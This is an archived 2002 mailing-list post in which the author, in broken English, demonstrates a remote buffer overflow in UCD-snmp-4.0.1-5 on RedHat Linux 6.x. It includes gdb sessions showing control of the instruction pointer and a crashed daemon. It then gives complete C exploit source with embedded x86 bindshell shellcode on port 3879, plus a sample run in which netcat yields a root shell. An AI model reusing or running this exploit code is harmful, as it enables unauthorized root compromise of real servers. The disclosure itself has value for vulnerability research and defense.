Hello :-) Tested ucd-snmp's various kinds version. Version that I touch is on RedHat Linux 6.x's "UCD-snmp-4.0.1-5" version. 4.0.1-4 and 4.0.1-5 are different authoritatively. I could succeed in 4.0.1-5 because I do exploit. All incidental and value are different, and different according to platform in version. However, have similar aspect. That gave some fallacy that did test at that time was that snmpwalk itself overflow gets up. It is same 4.0.1-5 version, but it was different LINUX. As enforce after establish setuid to snmpwalk, became root ... :-p However, I saw that snmpd daemon dies in actuality snmpd attack. Very interesting. I show process that do exploit. Attacked package of "UCD-snmp-4.0.1-5" version in same kind of RedHat Linux. [root@NewbieServer /root]# rpm -qa | grep snmp ucd-snmp-4.0.1-5 ucd-snmp-utils-4.0.1-5 ucd-snmp-devel-4.0.1-5 [root@NewbieServer /root]# /etc/rc.d/init.d/snmpd start > /dev/null && ps -ax | grep snmp; gdb -q /usr/sbin/snmpd 26600 pts/0 S 0:00 /usr/sbin/snmpd (no debugging symbols found)...(gdb) attach 26600 Attaching to program: /usr/sbin/snmpd, Pid 26600 Reading symbols from /usr/lib/libsnmp.so.0...(no debugging symbols found)... done. Reading symbols from /lib/libnsl.so.1...done. Reading symbols from /usr/lib/librpm.so.0...done. Reading symbols from /lib/libdb.so.2...done. Reading symbols from /usr/lib/libz.so.1...done. Reading symbols from /lib/libm.so.6...done. Reading symbols from /lib/libc.so.6...done. Reading symbols from /usr/lib/libbz2.so.0...done. Reading symbols from /lib/ld-linux.so.2...done. Reading symbols from /lib/libnss_files.so.2...done. 0x4018e54e in __select () from /lib/libc.so.6 (gdb) Another server shell: [root@WizardServer /root]# snmpwalk NewbieServer `perl -e 'print "x"x140'`XXXX `perl -e 'print "A"x112'` Timeout: No Response from NewbieServer [root@WizardServer /root]# gdb: (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) This is simple principle. --- Structure: -------------------------------------------- [xxx .. 140 .. xxx] XXXX [AAA .. 112 .. AAA] : total 256 NULL Value: 0x00 : total 257 ----------------------------------------------------------- Resemble closely with frame pointer attack. That last NULL value indicates address that it is shellcode "&shellcode" value indicate. Look why eip indicated 0x58585858. (gdb) info reg eip eip 0x58585858 0x58585858 (gdb) x/10 $esp-4 0xbfffd704: 0x58585858 0x41414141 0x41414141 0x41414141 ~~~~~~~~~~ 0xbfffd714: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffd724: 0x41414141 0x41414141 (gdb) 0xbfffd72c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffd73c: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffd74c: 0x41414141 0x41414141 (gdb) 0xbfffd754: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffd764: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfffd774: 0x41414141 0xbfffd700 ~~~~~~~~~~ (gdb) Indicate 4byte added cost. This does to associate pico editer attack. (gdb) q The program is running. Quit anyway (and detach it)? (y or n) y Detaching from program: /usr/sbin/snmpd, Pid 26600 [root@NewbieServer /root]# ps -aux | grep snmpd [root@NewbieServer /root]# Daemon died. This becomes local exploit and remote exploit. If daemon becomes overflow, remote attack may need some pain because have died at once. If know that above result principle, same Operating System version and ucd version to do exploit allowable. Author: Xpl017Elz E-mail: szoahcat_private & xploitat_private Home: http://x82.i21c.net P.S: Sorry. I gave up original English. Study English since next time. So, make understood other people. Thank you for reading unwise writing. ucd-snmp-4.0.1-5 exploit ---------------------------------------------------- /* ** ** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit ** ** === Testing: ============================================================= ** ** [x82@xpl017elz x82]$ id ** uid=501(x82) gid=501(x82) groups=501(x82) ** [x82@xpl017elz x82]$ ./snmpxpl -h 61.xx.177.32 ** ** UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit ** ** Exploit made by Xpl017Elz ** ** Shellcode Address: 0xbfffd710 ** Host: 61.xx.177.32 ** [&shellcode: 112byte] [NOP + shellcode: 144byte] [0x00] - total 257byte ** Open Port: 3879 (Default) ** ** Timeout: No Response from 61.xx.177.32 ** [x82@xpl017elz x82]$ nc 61.xx.177.32 3879 ** whoami; ** root ** pwd; ** /home/x82 ** id; ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm), ** 6(disk),10(wheel),503(secure) ** ** ========================================================================= ** ** exploit by "you dong-hun"(Xpl017Elz), <szoahcat_private>. ** My World: http://x82.i21c.net ** */ #include <stdio.h> #define DEFAULT 0 #define VALUES 112 #define HOST "127.0.0.1" #define DEFAULT_CODE 0xbfffd710 /* RedHat Linux 6.x ucd-snmp-4.0.1-5 */ #define SNMPWALK "/usr/bin/snmpwalk" /* snmpwalk PATH */ main(int argc, char *argv[]) { char shellcode[] = /* Linux(x86) bindshell on port 3879 */ "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; char xOx[257], connect[100], host[] = HOST, snmpwalk[] = SNMPWALK; int count = DEFAULT, num_1 = DEFAULT, num_2 = DEFAULT, num_3 = DEFAULT, jobst = DEFAULT, values = VALUES; unsigned long shelladdr = DEFAULT_CODE; extern char *optarg; bzero(xOx, 257); banrl(); while ((jobst = getopt(argc, argv, "h:s:v:")) !=EOF) switch (jobst) { case 'h': strcpy(host, optarg); break; case 's': shelladdr = strtoul(optarg, NULL, 0); break; case 'v': values = atoi(optarg); break; case '?': usages(argv[0]); exit(0); } for(num_1 = 0; num_1 < (values / 4); num_1++) { xOx[count++] = (shelladdr >> 0) & 0xff; xOx[count++] = (shelladdr >> 8) & 0xff; xOx[count++] = (shelladdr >> 16) & 0xff; xOx[count++] = (shelladdr >> 24) & 0xff; } if((0x100 - values) < 0x00000082) { printf("\n - Values error. :-(\n\n"); printf(" Space that shellcode comes is so narrow.\n"); printf(" Compose exploit again.\n\n"); exit(0); } for(num_2 = 0; num_2 < (0x100 - values) - strlen(shellcode); num_2++) { xOx[count++] = '@'; } for(num_3 = 0; num_3 < strlen(shellcode); num_3++) { xOx[count++] = shellcode[num_3]; } printf(" Shellcode Address: %p\n", shelladdr); printf(" Host: %s\n", host); printf(" [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte ",values,256-values); printf("Open Port: 3879 (Default)\n\n"); execl(snmpwalk, "snmpwalk", host, xOx, NULL); } banrl() { printf("\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n"); printf("\t\t Exploit made by Xpl017Elz\n\n"); } usages(char *var) { printf("\n Usage: %s -h [hostname] -s [address] -v [value]\n",var); printf("\n option: -h - IP address & Domain name"); printf("\n -s - Shellcode Address"); printf("\n -v - &Shellcode Size\n\n"); printf("\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n",var); } ----------------------------------------------------------------------------- -- Powered by Outblaze
This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 17:25:37 PST